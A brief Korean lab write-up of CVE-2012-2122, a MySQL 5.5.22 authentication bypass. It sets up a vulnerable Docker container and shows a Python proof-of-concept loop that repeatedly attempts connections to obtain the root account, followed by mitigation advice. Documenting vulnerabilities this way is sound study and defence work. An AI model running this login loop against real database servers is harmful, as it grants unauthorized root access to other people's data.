CVE-2012-2122

배소정 (@baethwjd2)

docker compose up -d 커맨드를 입력해 테스트 환경을 실행 (취약점이 보고된 MySQL 5.5.22의 컨테이너 이미지 사용)
pip install pymysql 커맨드로 poc.py 실행을 위한 pymysql 패키지 설치
python3 poc.py 를 실행해 DB의 root 계정을 탈취할 수 있음. 유저 정보를 출력하여 root 계정으로 로그인이 됐는지 확인

1/256의 확률로 로그인에 성공할 수 있으므로, 충분한 횟수만큼 로그인을 반복 시행한다.

for i in range(1, 10001):
    password = str(i)
    conn = pymysql.connect(user=user, password=password, host=host, port=port, charset='utf8')

유저 정보를 확인하여 root 계정 로그인에 성공했음을 확인한다.

cursor.execute("SELECT user()")

해당 취약점을 통해 공격자는 root를 포함한 특정 사용자 계정에 로그인하여, 인가되지 않은 권한을 획득할 수 있다.

이러한 상황을 방지하기 위해, 가장 먼저 관리자는 DB 서버의 네트워크가 노출되지 않도록 노력해야 한다. 즉, 인가되지 않은 액세스를 차단할 수 있도록 미리 서버를 설정해야 한다. 그리고 주기적으로 서비스 취약점을 모니터링하고 패치해야 한다.

Provide feedback